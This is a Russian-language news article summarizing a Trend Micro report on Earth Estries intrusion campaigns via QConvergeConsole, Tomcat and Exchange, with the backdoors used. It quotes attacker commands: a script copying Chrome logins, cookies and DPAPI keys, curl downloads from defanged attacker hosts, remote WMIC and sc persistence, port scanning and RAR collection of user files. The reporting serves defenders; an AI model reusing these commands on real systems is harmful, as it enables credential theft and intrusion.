Trend Micro подробно рассказала о двух масштабных хакерских кампаниях, запущенных группировкой Earth Estries. Злоумышленники применили продвинутые техники проникновения в корпоративные системы через уязвимости в широко распространенном программном обеспечении.
Первая схема атаки сфокусировалась на эксплуатации QConvergeConsole – инструмента для управления оптоволоконными адаптерами QLogic. После получения начального доступа хакеры использовали утилиты PsExec и WMIC для распространения вредоноса по сети.
Исследователи отмечают, что злоумышленники эксплуатировали уязвимости или некорректные настройки QConvergeConsole через установленный агент удаленного приложения (c:program filesqlogic corporationnqagentnetqlremote.exe), который позволял проводить сетевое сканирование и устанавливать Cobalt Strike на целевые машины.
В другом случае группировка использовала уязвимость в Apache Tomcat6, поставляемом с QConvergeConsole (c:program files (x86)qlogic corporationqconvergeconsoletomcat-x64apache-tomcat-6.0.35bintomcat6.exe), для бокового перемещения и управления инструментами поздних стадий атаки.
Группировка также активно применяла различные бэкдоры для закрепления в системе. Среди них – Cobalt Strike, Trillclient, Hemigate и новый образец под названием Crowdoor. Вредоносное ПО доставлялось на зараженные машины в виде CAB-архивов.
Особое внимание привлекает инструмент Trillclient, который похищал учетные данные из кэша браузеров. С его помощью злоумышленники получали дополнительный контроль над скомпрометированными системами. Earth Estries демонстрировали глубокое понимание инфраструктуры жертв – они напрямую скачивали документы из внутренних веб-хранилищ с помощью команды wget.
Trillclient запускал PowerShell-скрипт для сбора профилей пользователей:
foreach($win_user_path in $users_path){
echo D | xcopy “C:Users$win_user_pathAppDataRoamingMicrosoftProtect” “$copy_dest_path$win_user_pathProtect” /E /C /H;
attrib -a -s -r -h “$copy_dest_path$win_user_path*” /S /D;
echo F | xcopy “C:Users$win_user_pathAppDataLocalGoogleChromeUser DataLocal State” “$copy_dest_path$win_user_pathLocal State” /C;
echo F | xcopy “C:Users$win_user_pathAppDataLocalGoogleChromeUser DataDefaultNetworkCookies” “$copy_dest_path$win_user_pathDefaultNetworkCookies” /C
echo F | xcopy “C:Users$win_user_pathAppDataLocalGoogleChromeUser DataDefaultLogin Data” “$copy_dest_path$win_user_pathDefaultLogin Data” /C;
}
Во второй схеме атаки хакеры эксплуатировали уязвимости в Microsoft Exchange. На серверы устанавливался веб-шелл ChinaCopper, через который злоумышленники разворачивали Cobalt Strike и другие инструменты для бокового перемещения по сети.
Ключевыми компонентами этой цепочки стали бэкдоры Zingdoor и SnappyBee (известный также как Deed RAT). Вредоносное ПО загружалось либо с управляющих серверов, либо через curl-запросы к подконтрольным хакерам сайтам. Типичные команды для загрузки инструментов выглядели так:
curl -o c:windowsimeimejpVXTR hxxp://96[.]44[.]160[.]181/VXTR.txt
curl -k -o C:programdataUNBCL.dll hxxp://mail.ocac.org[.]pk/UNBCL.docx
curl -k -o C:programdataportscan.exe hxxp://mail.ocac.org[.]pk/Portscan.docx
В отличие от первой схемы, здесь основной акцент делался на эксплуатации Exchange и частом обновлении вредоносных программ для избежания обнаружения. Группировка активно использовала PortScan для картографирования сетей, а дополнительные бэкдоры помогали в сборе и экспорте документов через RAR-архивы.
Earth Estries уделяли особое внимание скрытному присутствию в сетях жертв. Они регулярно обновляли свои инструменты и заметали следы, удаляя старые версии вредоносного ПО. Длительное присутствие обеспечивалось различными кастомными бэкдорами, включая недавно обнаруженный Crowdoor, который взаимодействовал с Cobalt Strike.
Для закрепления в системе злоумышленники использовали различные методы создания задач по расписанию, в том числе удаленное создание через WMIC:
wmic /node: /user: /password:***** process call create “schtasks /run /tn microsoftsihost”
Исследователи выявили несколько техник, применяемых группировкой. Помимо кражи учетных данных через Trillclient, хакеры маскировали командный трафик через локальные и удаленные прокси-серверы.
Для разведки сетевой инфраструктуры использовались PortScan и специальные скрипты. После скачивания утилиты PortScan злоумышленники проводили сканирование сети на наличие открытых портов 80, 443, 445 и 3389:
cmd.exe /c “C:programdataportscan.exe 172.xx.xx.0/24 445,3389,80,443”
cmd.exe /c “C:programdataportscan.exe 172.xx.xx.0/24 445,3389,80,443 >1.log”
Собранные данные упаковывались в зашифрованные RAR-архивы и выгружались через анонимные файлообменники. Примеры команд для сбора данных:
rar.exe a -m5 his231.rar “C:Users\AppDataLocalGoogleChromeUser DataDefaultHistory”
rar.exe a 311.rar C:users\Desktop* C:users\Downloads* C:users\Documents* -r -y -ta
В ходе исследования были обнаружены дополнительные бэкдоры – FuxosDoor и Cryptmerlin. FuxosDoor работал как бэкдор для веб-сервера IIS, обеспечивая скрытую связь с командными серверами. Cryptmerlin использовал технику DLL sideloading для длительного контроля над зараженными машинами.
Zingdoor и SnappyBee функционировали как HTTP-бэкдоры, облегчая боковое перемещение по сети. SnappyBee представляет собой модульный бэкдор, считающийся преемником ShadowPad. Оба вредоноса использовали механизм DLL sideloading для внедрения в легитимные процессы.
Через веб-шелл ChinaChopper злоумышленники создавали удаленные службы для повышения привилегий и обеспечения персистентности:
sc \{hostname} create VGAuthtools type= own start= auto binpath= “c:windowsmicrosoft.netFrameworkv4.0.30319Installutil.exe C:ProgramdataVMwarevmvssrv.exe”
Новый бэкдор Crowdoor, замеченный в первой цепочке атак, расширял возможности группировки по переустановке и обновлению Cobalt Strike на скомпрометированных системах. Он выполнял различные действия в зависимости от переданных аргументов, включая установку механизмов персистентности через реестр или службы.
Веб-шелл ChinaCopper, использованный во второй схеме, предоставлял удаленный контроль над зараженными серверами Exchange и служил плацдармом для дальнейшего проникновения в сеть.
Специалисты настоятельно рекомендуют организациям устранять уязвимости в сервисах, доступных извне, особенно в широко используемых приложениях вроде почтовых серверов и консолей управления.